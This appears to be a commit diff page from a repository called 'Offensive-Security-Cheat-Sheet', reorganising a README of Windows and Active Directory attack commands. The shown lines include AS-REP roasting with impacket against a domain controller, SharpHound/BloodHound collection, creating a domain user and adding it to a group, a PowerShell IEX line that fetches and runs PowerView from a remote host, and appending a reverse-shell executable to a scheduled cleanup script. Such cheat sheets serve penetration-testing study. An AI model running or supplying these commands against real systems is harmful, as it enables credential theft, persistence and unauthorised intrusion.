kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-09-05 17:15:57 -04:00
committed by GitHub
parent c376a68f33
commit 6f5deb12a1
1 changed files with 20 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files

33
README.md
View File

@@ -646,21 +646,38 @@ upload {FILE.exe}
```bash ```bash
# Enumerate all local accounts
net user
# Enumerate entire domain
net user /domain
# Enumerate information about user
net user {USERNAME} /domain
# Enumerate all groups in domain
net group /domain
# ASREP ROAST # ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -format hashcat python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -format hashcat
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -userfile {USER.txt} -format hashcat python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -userfile {USER.txt} -format hashcat
# Bloodhound # Bloodhound
sudo ./usr/bin/neo4j console sudo ./usr/bin/neo4j console
# RHOST RHOST
./sharphound.exe -c all ./sharphound.exe -c all
# LHOST LHOST
./BloodHound --no-sandbox ./BloodHound --no-sandbox
# Add user
net user {USERNAME} {PASSWORD} /add /domain
# Add user to group
net group "{GROUP}" {USERNAME} /add
IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1") IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force $pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass) $cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)
@@ -1144,17 +1161,7 @@ echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
# Eumerate privileges # Eumerate privileges
whoami /all whoami /all
# Enumerate all local accounts
net user
# Enumerate entire domain
net user /domain
# Enumerate information about user
net user {USERNAME} /domain
# Enumerate all groups in domain
net group /domain
# PS # PS